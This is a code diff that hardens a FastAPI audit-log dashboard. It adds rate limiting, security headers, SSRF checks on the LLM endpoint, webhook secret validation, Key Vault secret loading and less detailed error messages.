4. **Add startup warning** when auth is enabled but no `AUTH_ALLOWED_ROLES`/`AUTH_ALLOWED_GROUPS` configured
5. **Document webhook security** — require `WEBHOOK_CLIENT_SECRET` in production
6. **Consider Key Vault integration** for `CLIENT_SECRET` and `LLM_API_KEY`
7. **Add per-user filtering option** — restrict events to those involving the authenticated user

View File

@@ -1 +1 @@
1.7.4 1.7.14

View File

@@ -1,3 +1,4 @@
import contextvars
import time import time
import requests import requests
@@ -15,6 +16,9 @@ from fastapi import Header, HTTPException
from jwt import ExpiredSignatureError, InvalidTokenError, decode from jwt import ExpiredSignatureError, InvalidTokenError, decode
from jwt.algorithms import RSAAlgorithm from jwt.algorithms import RSAAlgorithm
# Thread-/task-local storage for verified auth claims (used by audit middleware)
_auth_context: contextvars.ContextVar[dict | None] = contextvars.ContextVar("auth_context", default=None)
JWKS_CACHE = {"exp": 0, "keys": []} JWKS_CACHE = {"exp": 0, "keys": []}
logger = structlog.get_logger("aoc.auth") logger = structlog.get_logger("aoc.auth")
@@ -94,7 +98,9 @@ def user_can_access_privacy_services(claims: dict) -> bool:
def require_auth(authorization: str | None = Header(None)): def require_auth(authorization: str | None = Header(None)):
if not AUTH_ENABLED: if not AUTH_ENABLED:
return {"sub": "anonymous"} user = {"sub": "anonymous"}
_auth_context.set(user)
return user
if not authorization or not authorization.lower().startswith("bearer "): if not authorization or not authorization.lower().startswith("bearer "):
raise HTTPException(status_code=401, detail="Missing bearer token") raise HTTPException(status_code=401, detail="Missing bearer token")
@@ -106,4 +112,5 @@ def require_auth(authorization: str | None = Header(None)):
if not _allowed(claims, AUTH_ALLOWED_ROLES, AUTH_ALLOWED_GROUPS): if not _allowed(claims, AUTH_ALLOWED_ROLES, AUTH_ALLOWED_GROUPS):
raise HTTPException(status_code=403, detail="Forbidden") raise HTTPException(status_code=403, detail="Forbidden")
_auth_context.set(claims)
return claims return claims

View File

@@ -1,4 +1,10 @@
from pydantic_settings import BaseSettings, SettingsConfigDict from secrets_manager import load_key_vault_secrets
# Pre-load Azure Key Vault secrets into os.environ before pydantic-settings reads them.
# This is a no-op if AZURE_KEY_VAULT_NAME is not set.
load_key_vault_secrets()
from pydantic_settings import BaseSettings, SettingsConfigDict # noqa: E402
class Settings(BaseSettings): class Settings(BaseSettings):
@@ -68,6 +74,27 @@ class Settings(BaseSettings):
ALERT_WEBHOOK_FORMAT: str = "generic" # generic | slack | teams ALERT_WEBHOOK_FORMAT: str = "generic" # generic | slack | teams
ALERT_DEDUPE_MINUTES: int = 15 ALERT_DEDUPE_MINUTES: int = 15
# Webhook security
WEBHOOK_CLIENT_SECRET: str = ""
# Rate limiting
RATE_LIMIT_ENABLED: bool = True
RATE_LIMIT_REQUESTS: int = 120
RATE_LIMIT_WINDOW_SECONDS: int = 60
# Security / docs exposure
DOCS_ENABLED: bool = False
METRICS_ALLOWED_IPS: str = "127.0.0.1,::1,10.0.0.0/8,172.16.0.0/12,192.168.0.0/16"
# LLM endpoint restriction (comma-separated domains, e.g. "api.openai.com,*.openai.azure.com")
LLM_ALLOWED_DOMAINS: str = ""
# SIEM webhook restriction (comma-separated domains)
SIEM_ALLOWED_DOMAINS: str = ""
# Optional Azure Key Vault integration for secrets
AZURE_KEY_VAULT_NAME: str = ""
_settings = Settings() _settings = Settings()
@@ -113,3 +140,17 @@ DEFAULT_PAGE_SIZE = _settings.DEFAULT_PAGE_SIZE
ALERT_WEBHOOK_URL = _settings.ALERT_WEBHOOK_URL ALERT_WEBHOOK_URL = _settings.ALERT_WEBHOOK_URL
ALERT_WEBHOOK_FORMAT = _settings.ALERT_WEBHOOK_FORMAT ALERT_WEBHOOK_FORMAT = _settings.ALERT_WEBHOOK_FORMAT
ALERT_DEDUPE_MINUTES = _settings.ALERT_DEDUPE_MINUTES ALERT_DEDUPE_MINUTES = _settings.ALERT_DEDUPE_MINUTES
WEBHOOK_CLIENT_SECRET = _settings.WEBHOOK_CLIENT_SECRET
RATE_LIMIT_ENABLED = _settings.RATE_LIMIT_ENABLED
RATE_LIMIT_REQUESTS = _settings.RATE_LIMIT_REQUESTS
RATE_LIMIT_WINDOW_SECONDS = _settings.RATE_LIMIT_WINDOW_SECONDS
DOCS_ENABLED = _settings.DOCS_ENABLED
METRICS_ALLOWED_IPS = _settings.METRICS_ALLOWED_IPS
LLM_ALLOWED_DOMAINS = [d.strip().lower() for d in _settings.LLM_ALLOWED_DOMAINS.split(",") if d.strip()]
SIEM_ALLOWED_DOMAINS = [d.strip().lower() for d in _settings.SIEM_ALLOWED_DOMAINS.split(",") if d.strip()]
AZURE_KEY_VAULT_NAME = _settings.AZURE_KEY_VAULT_NAME

View File

@@ -12,6 +12,20 @@ alerts_collection = db["alerts"]
logger = structlog.get_logger("aoc.database") logger = structlog.get_logger("aoc.database")
def _dedupe_alert_rules():
"""Remove duplicate alert_rules by name, keeping the oldest document."""
try:
pipeline = [
{"$sort": {"_id": ASCENDING}},
{"$group": {"_id": "$name", "first_id": {"$first": "$_id"}}},
]
seen = {doc["_id"]: doc["first_id"] for doc in db["alert_rules"].aggregate(pipeline)}
for name, keep_id in seen.items():
db["alert_rules"].delete_many({"name": name, "_id": {"$ne": keep_id}})
except Exception:
pass # Collection may not exist yet
def setup_indexes(max_retries: int = 5, delay: float = 2.0): def setup_indexes(max_retries: int = 5, delay: float = 2.0):
"""Ensure MongoDB indexes exist. Retries on connection errors.""" """Ensure MongoDB indexes exist. Retries on connection errors."""
from time import sleep from time import sleep
@@ -23,6 +37,8 @@ def setup_indexes(max_retries: int = 5, delay: float = 2.0):
events_collection.create_index([("service", ASCENDING), ("timestamp", DESCENDING)]) events_collection.create_index([("service", ASCENDING), ("timestamp", DESCENDING)])
events_collection.create_index("id") events_collection.create_index("id")
saved_searches_collection.create_index([("created_by", ASCENDING), ("created_at", DESCENDING)]) saved_searches_collection.create_index([("created_by", ASCENDING), ("created_at", DESCENDING)])
_dedupe_alert_rules()
db["alert_rules"].create_index("name", unique=True)
events_collection.create_index( events_collection.create_index(
[("actor_display", TEXT), ("raw_text", TEXT), ("operation", TEXT)], [("actor_display", TEXT), ("raw_text", TEXT), ("operation", TEXT)],
name="text_search_index", name="text_search_index",

View File

@@ -5,8 +5,8 @@
<meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>Admin Operations Center</title> <title>Admin Operations Center</title>
<link rel="stylesheet" href="/style.css?v=15" /> <link rel="stylesheet" href="/style.css?v=15" />
<script defer src="https://cdn.jsdelivr.net/npm/alpinejs@3.x.x/dist/cdn.min.js"></script> <script defer src="https://cdn.jsdelivr.net/npm/alpinejs@3.x.x/dist/cdn.min.js" integrity="sha384-WPtu0YHhJ3arcykfnv1JgUffWDSKRnqnDeTpJUbOc2os2moEmLkIdaeR0trPN4be" crossorigin="anonymous"></script>
<script src="https://alcdn.msauth.net/browser/2.37.0/js/msal-browser.min.js" crossorigin="anonymous"></script> <script src="https://alcdn.msauth.net/browser/2.37.0/js/msal-browser.min.js" integrity="sha384-DUSOaqAzlZRiZxkDi8hL7hXJDZ+X39ZOAYV9ZDx44gUv9pozmcunJH02tjSFLPnW" crossorigin="anonymous"></script>
</head> </head>
<body> <body>
<div class="page" x-data="aocApp()" x-init="initApp()"> <div class="page" x-data="aocApp()" x-init="initApp()">
@@ -591,9 +591,15 @@
async initAuth() { async initAuth() {
try { try {
const res = await fetch('/api/config/auth'); const res = await fetch('/api/config/auth');
this.authConfig = await res.json(); if (!res.ok) {
} catch { console.error('Auth config fetch failed:', res.status, res.statusText);
this.authConfig = { auth_enabled: false }; this.authConfig = { auth_enabled: false, _error: res.status };
} else {
this.authConfig = await res.json();
}
} catch (err) {
console.error('Auth config fetch error:', err);
this.authConfig = { auth_enabled: false, _error: 'network' };
} }
try { try {
@@ -614,7 +620,17 @@
} }
if (!this.authConfig?.auth_enabled) { if (!this.authConfig?.auth_enabled) {
this.authBtnText = ''; this.authBtnText = 'Auth: OFF';
console.warn('AOC auth is disabled. Set AUTH_ENABLED=true in .env to enable login.');
return;
}
const tenantId = this.authConfig.tenant_id;
const clientId = this.authConfig.client_id;
if (!clientId || !tenantId) {
this.authBtnText = 'Auth: misconfigured';
this.statusText = 'Auth is enabled but client_id or tenant_id is missing. Check .env configuration.';
console.error('AOC auth misconfigured: missing client_id or tenant_id in /api/config/auth');
return; return;
} }
@@ -623,8 +639,6 @@
return; return;
} }
const tenantId = this.authConfig.tenant_id;
const clientId = this.authConfig.client_id;
const baseScope = this.authConfig.scope || ""; const baseScope = this.authConfig.scope || "";
this.authScopes = Array.from(new Set(['openid', 'profile', 'email', ...baseScope.split(/[ ,]+/).filter(Boolean)])); this.authScopes = Array.from(new Set(['openid', 'profile', 'email', ...baseScope.split(/[ ,]+/).filter(Boolean)]));
const authority = `https://login.microsoftonline.com/${tenantId}`; const authority = `https://login.microsoftonline.com/${tenantId}`;
@@ -1260,5 +1274,6 @@
}; };
} }
</script> </script>
</body> </body>
</html> </html>

View File

@@ -1,12 +1,24 @@
import asyncio import asyncio
import ipaddress
import logging import logging
import os
import time import time
from contextlib import suppress from contextlib import suppress
from pathlib import Path from pathlib import Path
import structlog import structlog
from audit_trail import log_action from audit_trail import log_action
from config import AI_FEATURES_ENABLED, CORS_ORIGINS, ENABLE_PERIODIC_FETCH, FETCH_INTERVAL_MINUTES from config import (
AI_FEATURES_ENABLED,
AUTH_ALLOWED_GROUPS,
AUTH_ALLOWED_ROLES,
AUTH_ENABLED,
CORS_ORIGINS,
DOCS_ENABLED,
ENABLE_PERIODIC_FETCH,
FETCH_INTERVAL_MINUTES,
METRICS_ALLOWED_IPS,
)
from database import setup_indexes from database import setup_indexes
from fastapi import FastAPI, HTTPException, Request from fastapi import FastAPI, HTTPException, Request
from fastapi.middleware.cors import CORSMiddleware from fastapi.middleware.cors import CORSMiddleware
@@ -50,13 +62,28 @@ def configure_logging():
configure_logging() configure_logging()
logger = structlog.get_logger("aoc.fetcher") logger = structlog.get_logger("aoc.fetcher")
app = FastAPI() # Disable OpenAPI docs in production by default
app = FastAPI(
docs_url="/docs" if DOCS_ENABLED else None,
redoc_url="/redoc" if DOCS_ENABLED else None,
openapi_url="/openapi.json" if DOCS_ENABLED else None,
)
# CORS: when auth is enabled, never allow credentials with wildcard origins
_effective_cors = CORS_ORIGINS
_cors_credentials = True
if AUTH_ENABLED and "*" in _effective_cors:
logger.warning(
"CORS wildcard (*) is insecure with AUTH_ENABLED=true and allow_credentials. "
"Disabling credentials. Set CORS_ORIGINS to your actual origin(s)."
)
_cors_credentials = False
app.add_middleware(CorrelationIdMiddleware) app.add_middleware(CorrelationIdMiddleware)
app.add_middleware( app.add_middleware(
CORSMiddleware, CORSMiddleware,
allow_origins=CORS_ORIGINS, allow_origins=_effective_cors,
allow_credentials=True, allow_credentials=_cors_credentials,
allow_methods=["*"], allow_methods=["*"],
allow_headers=["*"], allow_headers=["*"],
) )
@@ -73,34 +100,58 @@ async def prometheus_middleware(request: Request, call_next):
@app.middleware("http") @app.middleware("http")
async def cache_control_middleware(request: Request, call_next): async def security_headers_middleware(request: Request, call_next):
response = await call_next(request) response = await call_next(request)
# Prevent caching of HTML and API responses by default # Prevent caching of HTML and API responses by default
if request.url.path.startswith("/api/") or request.url.path in ("/", "/index.html"): if request.url.path.startswith("/api/") or request.url.path in ("/", "/index.html"):
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate" response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
response.headers["Pragma"] = "no-cache" response.headers["Pragma"] = "no-cache"
response.headers["Expires"] = "0" response.headers["Expires"] = "0"
# Basic CSP for the UI and API (allows MSAL auth flows)
if request.url.path.startswith("/api/") or request.url.path in ("/", "/index.html"):
response.headers["Content-Security-Policy"] = (
"default-src 'self'; "
"script-src 'self' 'unsafe-inline' 'unsafe-eval' cdn.jsdelivr.net alcdn.msauth.net; "
"style-src 'self' 'unsafe-inline'; "
"connect-src 'self' https://login.microsoftonline.com; "
"frame-src 'self' https://login.microsoftonline.com; "
"form-action 'self' https://login.microsoftonline.com; "
"img-src 'self' data:; "
"font-src 'self' data:;"
)
# Additional security headers
response.headers["X-Content-Type-Options"] = "nosniff"
response.headers["X-Frame-Options"] = "DENY"
response.headers["Referrer-Policy"] = "strict-origin-when-cross-origin"
response.headers["Permissions-Policy"] = (
"accelerometer=(), camera=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), payment=(), usb=()"
)
return response return response
@app.middleware("http")
async def rate_limit_middleware(request: Request, call_next):
"""Apply Redis-backed rate limiting before processing the request."""
# Exempt config and health endpoints from rate limiting
exempt_paths = {"/api/config/auth", "/api/config/features", "/health", "/metrics"}
if request.url.path.startswith("/api/") and request.url.path not in exempt_paths:
from rate_limiter import check_rate_limit
await check_rate_limit(request)
return await call_next(request)
@app.middleware("http") @app.middleware("http")
async def audit_middleware(request: Request, call_next): async def audit_middleware(request: Request, call_next):
response = await call_next(request) response = await call_next(request)
if request.url.path.startswith("/api/") and request.method in ("POST", "PATCH", "PUT", "DELETE"): if request.url.path.startswith("/api/") and request.method in ("POST", "PATCH", "PUT", "DELETE"):
from auth import AUTH_ENABLED
user = "anonymous" user = "anonymous"
if AUTH_ENABLED: if AUTH_ENABLED:
auth_header = request.headers.get("authorization", "") from auth import _auth_context
if auth_header.lower().startswith("bearer "):
try:
from jose import jwt
token = auth_header.split(" ", 1)[1] claims = _auth_context.get(None)
claims = jwt.get_unverified_claims(token) if isinstance(claims, dict):
user = claims.get("sub", "unknown") user = claims.get("sub", "unknown")
except Exception:
pass
log_action( log_action(
action=request.method.lower(), action=request.method.lower(),
resource=request.url.path, resource=request.url.path,
@@ -140,18 +191,66 @@ async def health_check():
raise HTTPException(status_code=503, detail="Database unavailable") from exc raise HTTPException(status_code=503, detail="Database unavailable") from exc
def _client_ip(request: Request) -> str:
"""Best-effort client IP: X-Forwarded-For first hop, or direct client host."""
forwarded = request.headers.get("x-forwarded-for")
if forwarded:
return forwarded.split(",")[0].strip()
return request.client.host if request.client else ""
def _is_metrics_allowed(ip: str) -> bool:
"""Check if IP is in the configured metrics allowlist."""
if not METRICS_ALLOWED_IPS:
return True
try:
client_addr = ipaddress.ip_address(ip)
except ValueError:
return False
for network in METRICS_ALLOWED_IPS.split(","):
network = network.strip()
if not network:
continue
try:
if client_addr in ipaddress.ip_network(network, strict=False):
return True
except ValueError:
continue
return False
@app.get("/metrics") @app.get("/metrics")
async def metrics(): async def metrics(request: Request):
client_ip = _client_ip(request)
if not _is_metrics_allowed(client_ip):
raise HTTPException(status_code=403, detail="Forbidden")
return Response(content=prometheus_metrics(), media_type="text/plain") return Response(content=prometheus_metrics(), media_type="text/plain")
@app.get("/api/version") @app.get("/api/version")
async def version(): async def version():
import os
return {"version": os.environ.get("VERSION", "unknown")} return {"version": os.environ.get("VERSION", "unknown")}
@app.exception_handler(Exception)
async def generic_exception_handler(request: Request, exc: Exception):
"""Return generic error messages for unhandled exceptions to avoid info leakage."""
if isinstance(exc, HTTPException):
from fastapi.responses import JSONResponse
return JSONResponse(
status_code=exc.status_code,
content={"detail": exc.detail},
headers=getattr(exc, "headers", None) or {},
)
logger.error("Unhandled exception", path=request.url.path, error=str(exc))
return Response(
content='{"detail":"Internal server error"}',
status_code=500,
media_type="application/json",
)
frontend_dir = Path(__file__).parent / "frontend" frontend_dir = Path(__file__).parent / "frontend"
app.mount("/", StaticFiles(directory=frontend_dir, html=True), name="frontend") app.mount("/", StaticFiles(directory=frontend_dir, html=True), name="frontend")
@@ -172,6 +271,19 @@ async def start_periodic_fetch():
from rules import seed_default_rules from rules import seed_default_rules
seed_default_rules() seed_default_rules()
logger.info(
"AOC startup",
version=os.environ.get("VERSION", "unknown"),
auth_enabled=AUTH_ENABLED,
ai_enabled=AI_FEATURES_ENABLED,
)
# Warn when auth is enabled but no role/group restrictions are configured
if AUTH_ENABLED and not AUTH_ALLOWED_ROLES and not AUTH_ALLOWED_GROUPS:
logger.warning(
"AUTH_ENABLED is true but no AUTH_ALLOWED_ROLES or AUTH_ALLOWED_GROUPS are configured. "
"Any Entra user in the tenant can authenticate and access AOC. "
"Set AUTH_ALLOWED_ROLES or AUTH_ALLOWED_GROUPS to restrict access."
)
if ENABLE_PERIODIC_FETCH: if ENABLE_PERIODIC_FETCH:
app.state.fetch_task = asyncio.create_task(_periodic_fetch()) app.state.fetch_task = asyncio.create_task(_periodic_fetch())

View File

@@ -41,6 +41,15 @@ from mcp_common import (
handle_search_events, handle_search_events,
) )
# Security warning: this standalone stdio server has no authentication.
# Only run it in trusted environments (e.g. local Claude Desktop) and
# ensure the MongoDB connection uses authenticated credentials.
print("=" * 60, file=sys.stderr)
print("AOC MCP Server (stdio transport)", file=sys.stderr)
print("WARNING: No authentication layer. Only run in trusted", file=sys.stderr)
print("environments or behind a VPN. See AGENTS.md for details.", file=sys.stderr)
print("=" * 60, file=sys.stderr)
app = Server("aoc") app = Server("aoc")

View File

@@ -63,12 +63,18 @@ class CommentAddRequest(BaseModel):
text: str text: str
class AlertCondition(BaseModel):
field: str
op: str # eq, neq, contains, in, after_hours
value: str | list[str] | None = None
class AlertRuleResponse(BaseModel): class AlertRuleResponse(BaseModel):
id: str | None = None id: str | None = None
name: str name: str
enabled: bool enabled: bool
severity: str severity: str
conditions: list[dict] conditions: list[AlertCondition]
message: str message: str

83
backend/rate_limiter.py Normal file
View File

@@ -0,0 +1,83 @@
"""Simple Redis-backed fixed-window rate limiter."""
import time
import structlog
from config import RATE_LIMIT_ENABLED, RATE_LIMIT_REQUESTS, RATE_LIMIT_WINDOW_SECONDS
from fastapi import HTTPException, Request
from redis_client import get_redis
logger = structlog.get_logger("aoc.rate_limit")
class RateLimitExceeded(HTTPException):
def __init__(self, retry_after: int):
super().__init__(
status_code=429,
detail="Rate limit exceeded. Please slow down.",
headers={"Retry-After": str(retry_after)},
)
def _get_identifier(request: Request) -> str:
"""Best-effort client identifier: authenticated sub, or X-Forwarded-For, or client host."""
user = getattr(request.state, "user", None)
if user and isinstance(user, dict):
sub = user.get("sub")
if sub and sub != "anonymous":
return f"user:{sub}"
forwarded = request.headers.get("x-forwarded-for")
if forwarded:
return f"ip:{forwarded.split(',')[0].strip()}"
return f"ip:{request.client.host if request.client else 'unknown'}"
def _get_path_category(path: str) -> str:
"""Bucket paths into rate-limit categories."""
if path.startswith("/api/fetch"):
return "fetch"
if path.startswith("/api/ask"):
return "ask"
if path.startswith("/api/events/bulk-tags"):
return "write"
return "default"
def _limit_for_category(category: str) -> tuple[int, int]:
"""Return (max_requests, window_seconds) for a category."""
if category == "fetch":
return (10, 3600) # 10 per hour
if category == "ask":
return (30, 60) # 30 per minute
if category == "write":
return (20, 60) # 20 per minute
return (RATE_LIMIT_REQUESTS, RATE_LIMIT_WINDOW_SECONDS)
async def check_rate_limit(request: Request):
"""Raise RateLimitExceeded if the client has exceeded their quota."""
if not RATE_LIMIT_ENABLED:
return
category = _get_path_category(request.url.path)
limit, window = _limit_for_category(category)
identifier = _get_identifier(request)
now = int(time.time())
window_key = now // window
redis_key = f"rate_limit:{identifier}:{category}:{window_key}"
try:
redis = await get_redis()
count = await redis.incr(redis_key)
if count == 1:
await redis.expire(redis_key, window)
if count > limit:
raise RateLimitExceeded(retry_after=window - (now % window))
except RateLimitExceeded:
raise
except Exception as exc:
logger.warning("Rate limiter Redis error; failing closed", error=str(exc))
raise RateLimitExceeded(retry_after=60) from None

View File

@@ -16,3 +16,8 @@ gunicorn
mcp mcp
redis redis
arq arq
# Optional: Azure Key Vault integration for secrets storage
# Uncomment if using AZURE_KEY_VAULT_NAME
# azure-identity
# azure-keyvault-secrets

View File

@@ -7,6 +7,7 @@ import httpx
import structlog import structlog
from auth import require_auth, user_can_access_privacy_services from auth import require_auth, user_can_access_privacy_services
from config import ( from config import (
LLM_ALLOWED_DOMAINS,
LLM_API_KEY, LLM_API_KEY,
LLM_API_VERSION, LLM_API_VERSION,
LLM_BASE_URL, LLM_BASE_URL,
@@ -397,8 +398,37 @@ def _format_events_for_llm(
return "\n".join(lines) return "\n".join(lines)
def _validate_llm_url(url: str):
"""Prevent SSRF by rejecting internal/reserved addresses and enforcing domain allowlist."""
from urllib.parse import urlparse
parsed = urlparse(url)
if parsed.scheme != "https":
raise RuntimeError("LLM_BASE_URL must use HTTPS")
hostname = (parsed.hostname or "").lower()
if not hostname:
raise RuntimeError("LLM_BASE_URL must have a valid hostname")
blocked = {"localhost", "127.0.0.1", "0.0.0.0", "::1", "169.254.169.254"}
if hostname in blocked:
raise RuntimeError(f"LLM_BASE_URL hostname '{hostname}' is not allowed")
# Block link-local and private IP ranges
import ipaddress
try:
ip = ipaddress.ip_address(hostname)
if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
raise RuntimeError(f"LLM_BASE_URL IP '{hostname}' is not allowed")
except ValueError:
pass # hostname is not an IP, which is fine
# Enforce domain allowlist if configured
if LLM_ALLOWED_DOMAINS:
allowed = any(hostname == d or (d.startswith("*.") and hostname.endswith(d[1:])) for d in LLM_ALLOWED_DOMAINS)
if not allowed:
raise RuntimeError(f"LLM_BASE_URL domain '{hostname}' is not in LLM_ALLOWED_DOMAINS")
def _build_chat_url(base_url: str, api_version: str) -> str: def _build_chat_url(base_url: str, api_version: str) -> str:
"""Construct the chat completions URL, handling Azure OpenAI endpoints."""
base = base_url.rstrip("/") base = base_url.rstrip("/")
url = base if base.endswith("/chat/completions") else f"{base}/chat/completions" url = base if base.endswith("/chat/completions") else f"{base}/chat/completions"
if api_version: if api_version:
@@ -424,6 +454,9 @@ async def _call_llm(
}, },
] ]
# SSRF guard: only allow known public HTTPS endpoints
_validate_llm_url(LLM_BASE_URL)
url = _build_chat_url(LLM_BASE_URL, LLM_API_VERSION) url = _build_chat_url(LLM_BASE_URL, LLM_API_VERSION)
headers = { headers = {
"Content-Type": "application/json", "Content-Type": "application/json",
@@ -570,6 +603,8 @@ async def _explain_event(event: dict, related: list[dict]) -> str:
}, },
] ]
_validate_llm_url(LLM_BASE_URL)
url = _build_chat_url(LLM_BASE_URL, LLM_API_VERSION) url = _build_chat_url(LLM_BASE_URL, LLM_API_VERSION)
headers = {"Content-Type": "application/json"} headers = {"Content-Type": "application/json"}
if "azure" in LLM_BASE_URL.lower() or "cognitiveservices" in LLM_BASE_URL.lower(): if "azure" in LLM_BASE_URL.lower() or "cognitiveservices" in LLM_BASE_URL.lower():
@@ -731,7 +766,7 @@ async def ask_question(body: AskRequest, user: dict = Depends(require_auth)):
raw_events = list(cursor) raw_events = list(cursor)
except Exception as exc: except Exception as exc:
logger.error("Failed to query events for ask", error=str(exc)) logger.error("Failed to query events for ask", error=str(exc))
raise HTTPException(status_code=500, detail=f"Database query failed: {exc}") from exc raise HTTPException(status_code=500, detail="Database query failed") from exc
for e in raw_events: for e in raw_events:
e["_id"] = str(e.get("_id", "")) e["_id"] = str(e.get("_id", ""))
@@ -803,7 +838,6 @@ async def ask_question(body: AskRequest, user: dict = Depends(require_auth)):
"total_matched": total, "total_matched": total,
"services_queried": query_services, "services_queried": query_services,
"excluded_services": excluded_services, "excluded_services": excluded_services,
"mongo_query": json.dumps(query, default=str),
}, },
llm_used=False, llm_used=False,
llm_error=None, llm_error=None,
@@ -863,7 +897,6 @@ async def ask_question(body: AskRequest, user: dict = Depends(require_auth)):
"total_matched": total, "total_matched": total,
"services_queried": query_services, "services_queried": query_services,
"excluded_services": excluded_services, "excluded_services": excluded_services,
"mongo_query": json.dumps(query, default=str),
}, },
llm_used=llm_used, llm_used=llm_used,
llm_error=llm_error, llm_error=llm_error,

View File

@@ -1,3 +1,4 @@
import structlog
from config import ( from config import (
AI_FEATURES_ENABLED, AI_FEATURES_ENABLED,
AUTH_CLIENT_ID, AUTH_CLIENT_ID,
@@ -9,14 +10,16 @@ from config import (
from fastapi import APIRouter from fastapi import APIRouter
router = APIRouter() router = APIRouter()
logger = structlog.get_logger("aoc.config")
@router.get("/config/auth") @router.get("/config/auth")
def auth_config(): def auth_config():
logger.debug("Auth config requested", auth_enabled=AUTH_ENABLED)
return { return {
"auth_enabled": AUTH_ENABLED, "auth_enabled": AUTH_ENABLED,
"tenant_id": AUTH_TENANT_ID, "tenant_id": AUTH_TENANT_ID if AUTH_ENABLED else "",
"client_id": AUTH_CLIENT_ID, "client_id": AUTH_CLIENT_ID if AUTH_ENABLED else "",
"scope": AUTH_SCOPE, "scope": AUTH_SCOPE,
"redirect_uri": None, # frontend uses window.location.origin by default "redirect_uri": None, # frontend uses window.location.origin by default
} }

View File

@@ -158,7 +158,7 @@ def list_events(
cursor_query = events_collection.find(query).sort([("timestamp", -1), ("_id", -1)]).limit(safe_page_size) cursor_query = events_collection.find(query).sort([("timestamp", -1), ("_id", -1)]).limit(safe_page_size)
events = list(cursor_query) events = list(cursor_query)
except Exception as exc: except Exception as exc:
raise HTTPException(status_code=500, detail=f"Failed to query events: {exc}") from exc raise HTTPException(status_code=500, detail="Failed to query events") from exc
next_cursor = None next_cursor = None
if len(events) == safe_page_size: if len(events) == safe_page_size:
@@ -241,9 +241,17 @@ def bulk_tags(
update = {"$set": {"tags": tags}} if body.mode == "replace" else {"$addToSet": {"tags": {"$each": tags}}} update = {"$set": {"tags": tags}} if body.mode == "replace" else {"$addToSet": {"tags": {"$each": tags}}}
try: try:
matched = events_collection.count_documents(query, limit=10001)
if matched > 10000:
raise HTTPException(
status_code=400,
detail="Bulk tag update matches too many events (>10000). Narrow your filters.",
)
result_obj = events_collection.update_many(query, update) result_obj = events_collection.update_many(query, update)
except HTTPException:
raise
except Exception as exc: except Exception as exc:
raise HTTPException(status_code=500, detail=f"Failed to update tags: {exc}") from exc raise HTTPException(status_code=500, detail="Failed to update tags") from exc
log_action( log_action(
"bulk_tags", "bulk_tags",
@@ -268,7 +276,7 @@ def filter_options(
actor_upns = sorted([a for a in events_collection.distinct("actor_upn") if a])[:safe_limit] actor_upns = sorted([a for a in events_collection.distinct("actor_upn") if a])[:safe_limit]
devices = sorted([a for a in events_collection.distinct("target_displays") if isinstance(a, str)])[:safe_limit] devices = sorted([a for a in events_collection.distinct("target_displays") if isinstance(a, str)])[:safe_limit]
except Exception as exc: except Exception as exc:
raise HTTPException(status_code=500, detail=f"Failed to load filter options: {exc}") from exc raise HTTPException(status_code=500, detail="Failed to load filter options") from exc
if not user_can_access_privacy_services(user): if not user_can_access_privacy_services(user):
services = [s for s in services if s not in PRIVACY_SERVICES] services = [s for s in services if s not in PRIVACY_SERVICES]

View File

@@ -1,5 +1,6 @@
import time import time
import structlog
from audit_trail import log_action from audit_trail import log_action
from auth import require_auth from auth import require_auth
from config import ALERTS_ENABLED from config import ALERTS_ENABLED
@@ -15,6 +16,8 @@ from sources.intune_audit import fetch_intune_audit
from sources.unified_audit import fetch_unified_audit from sources.unified_audit import fetch_unified_audit
from watermark import get_watermark, set_watermark from watermark import get_watermark, set_watermark
logger = structlog.get_logger("aoc.fetch")
router = APIRouter(dependencies=[Depends(require_auth)]) router = APIRouter(dependencies=[Depends(require_auth)])
@@ -85,5 +88,8 @@ def fetch_logs(
user.get("sub", "anonymous"), user.get("sub", "anonymous"),
) )
return result return result
except HTTPException:
raise
except Exception as exc: except Exception as exc:
raise HTTPException(status_code=502, detail=str(exc)) from exc logger.error("Fetch failed", error=str(exc))
raise HTTPException(status_code=502, detail="Failed to fetch audit logs") from exc

View File

@@ -1,4 +1,5 @@
import structlog import structlog
from config import WEBHOOK_CLIENT_SECRET
from fastapi import APIRouter, Request, Response from fastapi import APIRouter, Request, Response
router = APIRouter() router = APIRouter()
@@ -10,10 +11,21 @@ async def graph_webhook(request: Request):
""" """
Receive Microsoft Graph change notifications. Receive Microsoft Graph change notifications.
Handles the validation handshake by echoing validationToken. Handles the validation handshake by echoing validationToken.
Validates clientState on notifications to prevent spoofing.
""" """
validation_token = request.query_params.get("validationToken") validation_token = request.query_params.get("validationToken")
if validation_token: if validation_token:
return Response(content=validation_token, media_type="text/plain") # Microsoft sends validationToken as a query param during subscription creation.
# Echo it back as plain text to prove endpoint ownership.
# Validate to prevent content injection if endpoint is hit directly.
if len(validation_token) > 1024 or not validation_token.isascii():
logger.warning("Invalid validationToken rejected", length=len(validation_token))
return Response(status_code=400)
return Response(
content=validation_token,
media_type="text/plain",
headers={"X-Content-Type-Options": "nosniff"},
)
try: try:
body = await request.json() body = await request.json()
@@ -21,12 +33,26 @@ async def graph_webhook(request: Request):
logger.warning("Invalid webhook payload", error=str(exc)) logger.warning("Invalid webhook payload", error=str(exc))
return Response(status_code=400) return Response(status_code=400)
for notification in body.get("value", []): notifications = body.get("value", [])
if not isinstance(notifications, list):
logger.warning("Invalid webhook payload structure")
return Response(status_code=400)
for notification in notifications:
client_state = notification.get("clientState")
if WEBHOOK_CLIENT_SECRET and client_state != WEBHOOK_CLIENT_SECRET:
logger.warning(
"Graph webhook rejected: invalid clientState",
change_type=notification.get("changeType"),
resource=notification.get("resource"),
)
return Response(status_code=401)
logger.info( logger.info(
"Received Graph notification", "Received Graph notification",
change_type=notification.get("changeType"), change_type=notification.get("changeType"),
resource=notification.get("resource"), resource=notification.get("resource"),
client_state=notification.get("clientState"), client_state=client_state,
) )
return {"status": "accepted"} return {"status": "accepted"}

View File

@@ -12,6 +12,7 @@ from datetime import UTC, datetime, timedelta
import structlog import structlog
from config import ALERT_DEDUPE_MINUTES, ALERT_WEBHOOK_FORMAT, ALERT_WEBHOOK_URL from config import ALERT_DEDUPE_MINUTES, ALERT_WEBHOOK_FORMAT, ALERT_WEBHOOK_URL
from database import db from database import db
from pymongo import ASCENDING
logger = structlog.get_logger("aoc.rules") logger = structlog.get_logger("aoc.rules")
